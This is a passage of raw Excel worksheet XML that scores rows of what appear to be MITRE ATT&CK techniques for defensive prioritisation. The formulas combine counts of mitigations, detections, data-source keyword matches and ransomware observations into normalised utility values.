        <f t="array" ref="AJ192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK192" s="25">
        <f>IF(AJ192="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL192" s="25" t="str" cm="1">
        <f t="array" ref="AL192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM192" s="25">
        <f>IF(AL192="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN192" s="52">
        <v>0</v>
      </c>
      <c r="AO192" s="51">
        <v>0</v>
      </c>
      <c r="AP192" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6233333333333335E-2</v>
      </c>
      <c r="AQ192" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15411111111111112</v>
      </c>
      <c r="AR192" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15411111111111112</v>
      </c>
      <c r="AS192" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT192" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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93" spans="1:47" ht="32.1">
      <c r="A193" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9350476190476186E-2</v>
      </c>
      <c r="B193" s="25">
        <f>SUM(H193,M193,V193)*(1+SUM(AE193,AG193,AI193,AK193,AM193))</f>
        <v>0.39350476190476191</v>
      </c>
      <c r="C193" s="25" t="s">
        <v>849</v>
      </c>
      <c r="D193" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E193" s="25" t="s">
        <v>850</v>
      </c>
      <c r="F193" s="51">
        <v>1</v>
      </c>
      <c r="G193" s="51">
        <v>1</v>
      </c>
      <c r="H193" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I193">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J193">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K193">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L193">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M193" s="25">
        <v>0</v>
      </c>
      <c r="N193" s="51">
        <v>1</v>
      </c>
      <c r="O193" s="51">
        <v>1</v>
      </c>
      <c r="P193" s="51">
        <v>0</v>
      </c>
      <c r="Q193" s="51">
        <v>0</v>
      </c>
      <c r="R193" s="52" t="s">
        <v>836</v>
      </c>
      <c r="S193" s="51">
        <v>9</v>
      </c>
      <c r="T193" s="52" t="s">
        <v>837</v>
      </c>
      <c r="U193" s="51">
        <v>16</v>
      </c>
      <c r="V193" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24761904761904763</v>
      </c>
      <c r="W193">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X193">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y193">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z193">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA193">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB193">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC193" s="29" t="s">
        <v>851</v>
      </c>
      <c r="AD193" s="25" t="str" cm="1">
        <f t="array" ref="AD193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE193" s="25">
        <f>IF(AD193="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF193" s="25" t="str" cm="1">
        <f t="array" ref="AF193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG193" s="25">
        <f>IF(AF193="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH193" s="25" t="str" cm="1">
        <f t="array" ref="AH193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC193)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI193" s="25">
        <f>IF(AH193="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ193" s="25" t="str" cm="1">
        <f t="array" ref="AJ193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK193" s="25">
        <f>IF(AJ193="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL193" s="25" t="str" cm="1">
        <f t="array" ref="AL193">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC193)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM193" s="25">
        <f>IF(AL193="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN193" s="60">
        <v>0</v>
      </c>
      <c r="AO193" s="51">
        <v>0</v>
      </c>
      <c r="AP193" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9350476190476186E-2</v>
      </c>
      <c r="AQ193" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13116825396825396</v>
      </c>
      <c r="AR193" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13116825396825396</v>
      </c>
      <c r="AS193" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT193" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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94" spans="1:47" ht="32.1">
      <c r="A194" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.16447619047619E-2</v>
      </c>
      <c r="B194" s="25">
        <f>SUM(H194,M194,V194)*(1+SUM(AE194,AG194,AI194,AK194,AM194))</f>
        <v>0.41644761904761901</v>
      </c>
      <c r="C194" s="25" t="s">
        <v>852</v>
      </c>
      <c r="D194" s="25" t="s">
        <v>690</v>
      </c>
      <c r="E194" s="25" t="s">
        <v>853</v>
      </c>
      <c r="F194" s="51">
        <v>1</v>
      </c>
      <c r="G194" s="51">
        <v>1</v>
      </c>
      <c r="H194" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I194">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J194">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K194">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L194">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M194" s="25">
        <v>0</v>
      </c>
      <c r="N194" s="51">
        <v>0</v>
      </c>
      <c r="O194" s="51">
        <v>0</v>
      </c>
      <c r="P194" s="51">
        <v>0</v>
      </c>
      <c r="Q194" s="51">
        <v>0</v>
      </c>
      <c r="R194" s="52" t="s">
        <v>854</v>
      </c>
      <c r="S194" s="51">
        <v>12</v>
      </c>
      <c r="T194" s="52" t="s">
        <v>855</v>
      </c>
      <c r="U194" s="51">
        <v>14</v>
      </c>
      <c r="V194" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24761904761904763</v>
      </c>
      <c r="W194">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X194">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y194">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z194">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA194">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB194">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC194" s="29" t="s">
        <v>856</v>
      </c>
      <c r="AD194" s="25" t="str" cm="1">
        <f t="array" ref="AD194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC194)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE194" s="25">
        <f>IF(AD194="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF194" s="25" t="str" cm="1">
        <f t="array" ref="AF194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC194)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG194" s="25">
        <f>IF(AF194="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH194" s="25" t="str" cm="1">
        <f t="array" ref="AH194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC194)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI194" s="25">
        <f>IF(AH194="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ194" s="25" t="str" cm="1">
        <f t="array" ref="AJ194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC194)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK194" s="25">
        <f>IF(AJ194="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL194" s="25" t="str" cm="1">
        <f t="array" ref="AL194">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC194)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM194" s="25">
        <f>IF(AL194="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN194" s="60">
        <v>0</v>
      </c>
      <c r="AO194" s="51">
        <v>0</v>
      </c>
      <c r="AP194" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.16447619047619E-2</v>
      </c>
      <c r="AQ194" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.138815873015873</v>
      </c>
      <c r="AR194" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.138815873015873</v>
      </c>
      <c r="AS194" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT194" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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95" spans="1:47" ht="48">
      <c r="A195" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5599999999999995E-2</v>
      </c>
      <c r="B195" s="25">
        <f>SUM(H195,M195,V195)*(1+SUM(AE195,AG195,AI195,AK195,AM195))</f>
        <v>0.45600000000000002</v>
      </c>
      <c r="C195" s="25" t="s">
        <v>857</v>
      </c>
      <c r="D195" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E195" s="25" t="s">
        <v>858</v>
      </c>
      <c r="F195" s="51">
        <v>1</v>
      </c>
      <c r="G195" s="51">
        <v>1</v>
      </c>
      <c r="H195" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I195">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J195">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K195">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L195">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M195" s="25">
        <v>0</v>
      </c>
      <c r="N195" s="51">
        <v>0</v>
      </c>
      <c r="O195" s="51">
        <v>2</v>
      </c>
      <c r="P195" s="51">
        <v>3</v>
      </c>
      <c r="Q195" s="51">
        <v>0</v>
      </c>
      <c r="R195" s="52" t="s">
        <v>859</v>
      </c>
      <c r="S195" s="51">
        <v>14</v>
      </c>
      <c r="T195" s="51" t="s">
        <v>860</v>
      </c>
      <c r="U195" s="51">
        <v>9</v>
      </c>
      <c r="V195" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24285714285714285</v>
      </c>
      <c r="W195">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>23</v>
      </c>
      <c r="X195">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Y195">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z195">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA195">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB195">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC195" s="29" t="s">
        <v>861</v>
      </c>
      <c r="AD195" s="25" t="str" cm="1">
        <f t="array" ref="AD195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC195)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE195" s="25">
        <f>IF(AD195="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF195" s="25" t="str" cm="1">
        <f t="array" ref="AF195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC195)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG195" s="25">
        <f>IF(AF195="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH195" s="25" t="str" cm="1">
        <f t="array" ref="AH195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC195)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI195" s="25">
        <f>IF(AH195="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ195" s="25" t="str" cm="1">
        <f t="array" ref="AJ195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC195)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK195" s="25">
        <f>IF(AJ195="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL195" s="25" t="str" cm="1">
        <f t="array" ref="AL195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC195)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM195" s="25">
        <f>IF(AL195="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN195" s="59">
        <v>0</v>
      </c>
      <c r="AO195" s="51">
        <v>0</v>
      </c>
      <c r="AP195" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.5599999999999995E-2</v>
      </c>
      <c r="AQ195" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.152</v>
      </c>
      <c r="AR195" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.152</v>
      </c>
      <c r="AS195" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT195" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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96" spans="1:47" ht="63.95">
      <c r="A196" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="B196" s="25">
        <f>SUM(H196,M196,V196)*(1+SUM(AE196,AG196,AI196,AK196,AM196))</f>
        <v>0.44966666666666671</v>
      </c>
      <c r="C196" s="25" t="s">
        <v>862</v>
      </c>
      <c r="D196" s="25" t="s">
        <v>863</v>
      </c>
      <c r="E196" s="25" t="s">
        <v>864</v>
      </c>
      <c r="F196" s="51">
        <v>1</v>
      </c>
      <c r="G196" s="51">
        <v>1</v>
      </c>
      <c r="H196" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I196">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J196">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K196">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L196">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M196" s="25">
        <v>0</v>
      </c>
      <c r="N196" s="51">
        <v>0</v>
      </c>
      <c r="O196" s="51">
        <v>3</v>
      </c>
      <c r="P196" s="51">
        <v>3</v>
      </c>
      <c r="Q196" s="51">
        <v>0</v>
      </c>
      <c r="R196" s="52" t="s">
        <v>865</v>
      </c>
      <c r="S196" s="51">
        <v>6</v>
      </c>
      <c r="T196" s="52" t="s">
        <v>866</v>
      </c>
      <c r="U196" s="51">
        <v>16</v>
      </c>
      <c r="V196" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23809523809523814</v>
      </c>
      <c r="W196">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X196">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y196">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z196">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA196">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB196">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC196" s="29" t="s">
        <v>867</v>
      </c>
      <c r="AD196" s="25" t="str" cm="1">
        <f t="array" ref="AD196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC196)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE196" s="25">
        <f>IF(AD196="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF196" s="25" t="str" cm="1">
        <f t="array" ref="AF196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG196" s="25">
        <f>IF(AF196="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH196" s="25" t="str" cm="1">
        <f t="array" ref="AH196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC196)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI196" s="25">
        <f>IF(AH196="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ196" s="25" t="str" cm="1">
        <f t="array" ref="AJ196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK196" s="25">
        <f>IF(AJ196="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL196" s="25" t="str" cm="1">
        <f t="array" ref="AL196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM196" s="25">
        <f>IF(AL196="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN196" s="60">
        <v>0</v>
      </c>
      <c r="AO196" s="51">
        <v>0</v>
      </c>
      <c r="AP196" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
      <c r="AQ196" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AR196" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1498888888888889</v>
      </c>
      <c r="AS196" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT196" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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97" spans="1:47" ht="48">
      <c r="A197" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4966666666666669E-2</v>
      </c>
